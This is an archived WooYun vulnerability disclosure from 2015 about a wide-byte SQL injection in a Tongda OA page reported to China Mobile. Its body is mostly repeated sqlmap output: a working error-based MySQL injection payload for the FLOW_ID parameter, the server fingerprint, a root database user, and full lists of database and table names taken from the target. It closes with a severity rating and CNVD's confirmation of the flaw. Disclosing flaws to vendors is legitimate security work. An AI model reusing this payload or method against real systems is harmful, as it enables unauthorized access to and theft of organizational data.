乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-21: 细节已通知厂商并且等待厂商处理中 2015-10-23: 厂商已经确认,细节仅向厂商公开 2015-11-02: 细节向核心白帽子及相关领域专家公开 2015-11-12: 细节向普通白帽子公开 2015-11-22: 细节向实习白帽子公开 2015-12-07: 细节向公众公开
**.**.**.**/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 7735 FROM(SELECT COUNT(*),CONCAT(0x7161686b71,(SELECT (CASE WHEN (7735=7735) THEN 1 ELSE 0 END)),0x7164656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Pewq---web server operating system: Windowsweb application technology: Apache 2.2.19, PHP 5.2.17back-end DBMS: MySQL 5.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 7735 FROM(SELECT COUNT(*),CONCAT(0x7161686b71,(SELECT (CASE WHEN (7735=7735) THEN 1 ELSE 0 END)),0x7164656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Pewq---web server operating system: Windowsweb application technology: Apache 2.2.19, PHP 5.2.17back-end DBMS: MySQL 5.0current user: 'root@**.**.**.**'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 7735 FROM(SELECT COUNT(*),CONCAT(0x7161686b71,(SELECT (CASE WHEN (7735=7735) THEN 1 ELSE 0 END)),0x7164656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Pewq---web server operating system: Windowsweb application technology: Apache 2.2.19, PHP 5.2.17back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 7735 FROM(SELECT COUNT(*),CONCAT(0x7161686b71,(SELECT (CASE WHEN (7735=7735) THEN 1 ELSE 0 END)),0x7164656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Pewq---web server operating system: Windowsweb application technology: Apache 2.2.19, PHP 5.2.17back-end DBMS: MySQL 5.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: FLOW_ID=11%bf' AND (SELECT 7735 FROM(SELECT COUNT(*),CONCAT(0x7161686b71,(SELECT (CASE WHEN (7735=7735) THEN 1 ELSE 0 END)),0x7164656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- Pewq---web server operating system: Windowsweb application technology: Apache 2.2.19, PHP 5.2.17back-end DBMS: MySQL 5.0Database: web[1 table]+----------------------------------------------+| temptab |+----------------------------------------------+Database: performance_schema[17 tables]+----------------------------------------------+| cond_instances || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || mutex_instances || performance_timers || rwlock_instances || setup_consumers || setup_instruments || setup_timers || threads |+----------------------------------------------+Database: BUS[16 tables]+----------------------------------------------+| bj_line || bs_line || cd_line || city || cq_line || gz_line || hz_line || km_line || nj_line || post_tel || qd_line || sh_line || sz_line || tj_line || wh_line || xa_line |+----------------------------------------------+Database: TRAIN[5 tables]+----------------------------------------------+| kind || pass || price || station || train |+----------------------------------------------+Database: mysql[24 tables]+----------------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------+Database: TD_OA[394 tables]+----------------------------------------------+| session || user || version || address || address_group || affair || app_log || attachment || attachment_edit || attachment_module || attachment_position || attend_ask_duty || attend_config || attend_duty || attend_evection || attend_holiday || attend_leave || attend_machine || attend_manager || attend_out || attendance_overtime || bbs_board || bbs_comment || book_info || book_manage || book_manager || book_type || bs_line || calendar || categories_type || censor_data || censor_module || censor_words || chatroom || connect_config || contact || contract || contract_line || countdown || cp_asset_keep || cp_asset_reflect || cp_asset_type || cp_assetcfg || cp_cptl_info || cp_dpct_sub || cp_prcs_prop || crm_account || crm_account_care || crm_account_contact || crm_action || crm_complain || crm_contract || crm_customer_service || crm_depository || crm_diary_setting || crm_email_html_model || crm_html_model || crm_marketing || crm_module_1 || crm_module_10 || crm_module_11 || crm_module_2 || crm_module_3 || crm_module_4 || crm_module_5 || crm_module_6 || crm_module_7 || crm_module_8 || crm_module_9 || crm_opportunity || crm_opportunity_products_list || crm_order || crm_order_products_list || crm_procurement_payment || crm_product || crm_product_type || crm_purchase_order || crm_purchase_order_products_list || crm_quotation || crm_quotation_products_list || crm_salepay || crm_solutions || crm_stockout || crm_stockout_products_list || crm_storage || crm_storage_products_list || crm_supplier || crm_supplier_contact || crm_sys_audit || crm_sys_block_item || crm_sys_code || crm_sys_code_type || crm_sys_entity || crm_sys_entity_index || crm_sys_entity_op || crm_sys_fast_new || crm_sys_field || crm_sys_layout_block || crm_sys_layout_item || crm_sys_list_view || crm_sys_list_view_color || crm_sys_list_view_default || crm_sys_list_view_field || crm_sys_list_view_map || crm_sys_list_view_order || crm_sys_list_view_rule || crm_sys_list_view_rule_parent || crm_sys_op || crm_sys_op_priv || crm_sys_op_priv_template || crm_sys_picklist || crm_sys_quick_link || crm_sys_relation || crm_sys_report || crm_sys_report_chart || crm_sys_report_column || crm_sys_report_dir || crm_sys_report_filter || crm_sys_report_filter_parent || crm_sys_report_group || crm_sys_report_summary || crm_sys_report_sysdefine || crm_sys_search || crm_sys_status || crm_sys_status_type || crm_sys_uv || crm_sys_uv_field || customer || daemon_config || daemon_hardware_info || daemon_process_info || daemon_services_config || daemon_services_status || daemon_services_tmp || data_2013xmmc || data_2014gc || data_2015gc || data_src || data_whxmmc || data_xmmx || department || dept_map || diary || diary_comment || diary_comment_reply || doc_keywords || doc_print_log || doc_recv_data || doc_recv_prcs || doc_recv_priv || doc_send_data || doc_send_prcs || doc_type || doc_user_data || doc_user_data2 || efax_account || efax_receive_box || efax_send_box || email || email_body || email_box || email_boxgroup || email_name || esb_info || esb_msg_recv || esb_msg_send || esb_workflow || esb_workflow_rule || exam_data || exam_flow || exam_paper || exam_quiz || exam_quiz_set || ext_dept || ext_user || field_date || fieldsetting || file_content || file_sort || flow_data_29 || flow_data_31 || flow_data_32 || flow_data_33 || flow_data_34 || flow_data_37 || flow_data_38 || flow_data_39 || flow_data_41 || flow_data_42 || flow_data_44 || flow_data_46 || flow_data_47 || flow_data_49 || flow_data_50 || flow_data_51 || flow_data_52 || flow_data_54 || flow_data_55 || flow_data_56 || flow_data_57 || flow_data_58 || flow_data_59 || flow_data_60 || flow_form_type || flow_form_version || flow_hook || flow_manage_log || flow_print_tpl || flow_priv || flow_process || flow_query_tpl || flow_report || flow_report_priv || flow_rule || flow_run || flow_run_attach || flow_run_data || flow_run_feedback || flow_run_hook || flow_run_log || flow_run_prcs || flow_sort || flow_timer || flow_type || flow_version || form_sort || gbt_conf || gwiki_cate || gwiki_fav || gwiki_log || gwiki_priv || gwiki_tag || gwiki_template || gwiki_term || gwiki_term_final || gwiki_term_temp || hr_card_module || hr_care_task || hr_code || hr_insurance_default || hr_insurance_manage || hr_insurance_para || hr_manager || hr_recruit_filter || hr_recruit_plan || hr_recruit_pool || hr_recruit_recruitment || hr_recruit_requirements || hr_sal_data || hr_staff_care || hr_staff_contract || hr_staff_incentive || hr_staff_info || hr_staff_labor_skills || hr_staff_learn_experience || hr_staff_leave || hr_staff_license || hr_staff_reinstatement || hr_staff_relatives || hr_staff_title_evaluation || hr_staff_transfer || hr_staff_work_experience || hr_training_examine || hr_training_plan || hr_training_record || hr_wage_manage || hr_welfare_manage || hrms || html_model || icqcontact_tb || icqmsgs_tb || icqservermsg_tb || im_cluster || im_group || im_group_maxmsgid || im_group_msg || im_message_cache || im_offline_file || index_article || index_keyword || index_search || interface || ip_rule || linkman || login_app || meeting || meeting_comment || meeting_equipment || meeting_room || message || message2 || module_priv || mytable || netchat || netdisk || netmeeting || news || news_comment || notes || notify || oa_cyclesource_used || oa_source || oa_source_used || oc_log || office_depository || office_products || office_task || office_transhistory || office_type || order_line || picture || plan_type || portal || product || proj_bug || proj_comment || proj_cost || proj_field_date || proj_fieldsetting || proj_file || proj_file_log || proj_file_sort || proj_forum || proj_priv || proj_project || proj_sys_code || proj_task || proj_task_log || provider || provider_linkman || rms_file || rms_lend || rms_roll || rms_roll_room || rsa_keypair || sal_data || sal_flow || sal_item || sale_history || sale_manager || score_date || score_flow || score_group || score_item || seal || seal_keylic || seal_log || secure_key || service || sms || sms2 || sms2_priv || sms3 || sms_body || supply_history || supply_order || sys_code || sys_function || sys_log || sys_menu || sys_para || task || unit || url || user_ext || user_group || user_map || user_online || user_priv || vehicle || vehicle_maintenance || vehicle_oil_use || vehicle_operator || vehicle_usage || vi_flow_run || vi_user || vote_data || vote_item || vote_title || webmail || webmail_body || weixun_share || weixun_share_topic || wiki_ask || wiki_ask_answer || wiki_comment || wiki_info || winexe || word_model || work_detail || work_person || work_plan || zbap_paiban || zl_file |+----------------------------------------------+Database: crscell[292 tables]+----------------------------------------------+| crs_autocode || crs_chart || crs_codeindex || crs_codeitem || crs_columnindex || crs_database || crs_detailreadpriv || crs_detailwritepriv || crs_entrust || crs_formulas || crs_hyperlink || crs_logiccheck || crs_para || crs_pntpara || crs_readstate || crs_repkind || crs_report || crs_reportbulletin || crs_reportstate || crs_synsign || crs_tabledata158 || crs_tabledata159 || crs_tabledata160 || crs_tabledata161 || crs_tabledata162 || crs_tabledata163 || crs_tabledata164 || crs_tabledata165 || crs_tabledata166 || crs_tabledata167 || crs_tabledata168 || crs_tabledata169 || crs_tabledata170 || crs_tabledata171 || crs_tabledata172 || crs_tabledata173 || crs_tabledata174 || crs_tabledata175 || crs_tabledata239 || crs_tabledata240 || crs_tabledata241 || crs_tabledata242 || crs_tabledata245 || crs_tabledata246 || crs_tabledata258 || crs_tabledata259 || crs_tabledata260 || crs_tabledata274 || crs_tabledata275 || crs_tabledata276 || crs_tabledata277 || crs_tabledata280 || crs_tabledata281 || crs_tabledata282 || crs_tabledata304 || crs_tabledata305 || crs_tabledata306 || crs_tabledata307 || crs_tabledata308 || crs_tabledata309 || crs_tabledata310 || crs_tabledata311 || crs_tabledata312 || crs_tabledata313 || crs_tabledata314 || crs_tabledata315 || crs_tabledata316 || crs_tabledata317 || crs_tabledata318 || crs_tabledata319 || crs_tabledata320 || crs_tabledata321 || crs_tabledata322 || crs_tabledata323 || crs_tabledata324 || crs_tabledata325 || crs_tabledata326 || crs_tabledata327 || crs_tabledata328 || crs_tabledata329 || crs_tabledata330 || crs_tabledata331 || crs_tabledata332 || crs_tabledata333 || crs_tabledata334 || crs_tabledata335 || crs_tabledata336 || crs_tabledata337 || crs_tabledata338 || crs_tabledata339 || crs_tabledata340 || crs_tabledata341 || crs_tabledata342 || crs_tabledata343 || crs_tabledata344 || crs_tabledata345 || crs_tabledata346 || crs_tabledata347 || crs_tabledata348 || crs_tabledata349 || crs_tabledata350 || crs_tabledata351 || crs_tabledata352 || crs_tabledata353 || crs_tabledata354 || crs_tabledata355 || crs_tabledata356 || crs_tabledata357 || crs_tabledata358 || crs_tabledata359 || crs_tabledata360 || crs_tabledata386 || crs_tabledata387 || crs_tabledata388 || crs_tabledata389 || crs_tabledata390 || crs_tabledata391 || crs_tabledata392 || crs_tabledata393 || crs_tabledata394 || crs_tabledata395 || crs_tabledata396 || crs_tabledata397 || crs_tabledata398 || crs_tabledata399 || crs_tabledata400 || crs_tabledata401 || crs_tabledata402 || crs_tabledata403 || crs_tabledata404 || crs_tabledata405 || crs_tabledata406 || crs_tabledata407 || crs_tabledata408 || crs_tabledata409 || crs_tabledata410 || crs_tabledata411 || crs_tabledata412 || crs_tabledata413 || crs_tabledata414 || crs_tabledata415 || crs_tabledata416 || crs_tabledata417 || crs_tabledata418 || crs_tabledata419 || crs_tabledata420 || crs_tabledata421 || crs_tabledata422 || crs_tabledata423 || crs_tabledata424 || crs_tabledata425 || crs_tabledata426 || crs_tabledata427 || crs_tabledata428 || crs_tabledata429 || crs_tabledata430 || crs_tabledata431 || crs_tabledata432 || crs_tabledata433 || crs_tabledata434 || crs_tabledata435 || crs_tabledata436 || crs_tabledata437 || crs_tabledata438 || crs_tabledata439 || crs_tabledata440 || crs_tabledata441 || crs_tabledata442 || crs_tabledata443 || crs_tabledata444 || crs_tabledata445 || crs_tabledata446 || crs_tabledata447 || crs_tabledata448 || crs_tabledata449 || crs_tabledata450 || crs_tabledata451 || crs_tabledata452 || crs_tabledata453 || crs_tabledata454 || crs_tabledata455 || crs_tabledata456 || crs_tabledata457 || crs_tabledata458 || crs_tabledata459 || crs_tabledata460 || crs_tabledata461 || crs_tabledata462 || crs_tabledata463 || crs_tabledata464 || crs_tabledata465 || crs_tabledata466 || crs_tabledata467 || crs_tabledata468 || crs_tabledata469 || crs_tabledata470 || crs_tabledata471 || crs_tabledata472 || crs_tabledata473 || crs_tabledata474 || crs_tabledata475 || crs_tabledata476 || crs_tabledata477 || crs_tabledata478 || crs_tabledata479 || crs_tabledata489 || crs_tabledata490 || crs_tabledata491 || crs_tabledata492 || crs_tabledata493 || crs_tabledata494 || crs_tabledata496 || crs_tabledata497 || crs_tabledata498 || crs_tabledata499 || crs_tabledata500 || crs_tabledata501 || crs_tabledata502 || crs_tabledata503 || crs_tabledata504 || crs_tabledata505 || crs_tabledata506 || crs_tabledata507 || crs_tabledata508 || crs_tabledata509 || crs_tabledata510 || crs_tabledata511 || crs_tabledata517 || crs_tabledata521 || crs_tabledata522 || crs_tabledata523 || crs_tabledata527 || crs_tabledata528 || crs_tabledata529 || crs_tabledata530 || crs_tabledata531 || crs_tabledata532 || crs_tabledata533 || crs_tabledata534 || crs_tabledata535 || crs_tabledata536 || crs_tabledata540 || crs_tabledata541 || crs_tabledata542 || crs_tabledata543 || crs_tabledata544 || crs_tabledata545 || crs_tabledata546 || crs_tabledata547 || crs_tabledata548 || crs_tabledata549 || crs_tabledata550 || crs_tabledata551 || crs_tabledata552 || crs_tabledata553 || crs_tabledata554 || crs_tabledata555 || crs_tabledata556 || crs_tabledata557 || crs_tabledata558 || crs_tabledata559 || crs_tabledata560 || crs_tabledata562 || crs_tabledata563 || crs_tabledata564 || crs_tabledata565 || crs_tabledata566 || crs_tabledata567 || crs_tabledata568 || crs_tabledata569 || crs_tabledata570 || crs_tabledata571 || crs_tabledata572 || crs_tabledata573 || crs_tabledata574 || crs_tabledata575 || crs_tabledata576 || crs_tabledata577 || crs_tabledata578 || crs_tabledata584 || crs_tabledata585 || crs_tabledata586 || crs_tabledata587 || crs_tabledata588 || crs_tabledata589 || crs_tabledata590 || crs_tabledata591 || crs_tabledata592 || crs_tabledata603 || crs_tableindex || crs_workflow || datatype |+----------------------------------------------+Database: information_schema[37 tables]+----------------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+----------------------------------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-23 10:59
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.
暂无
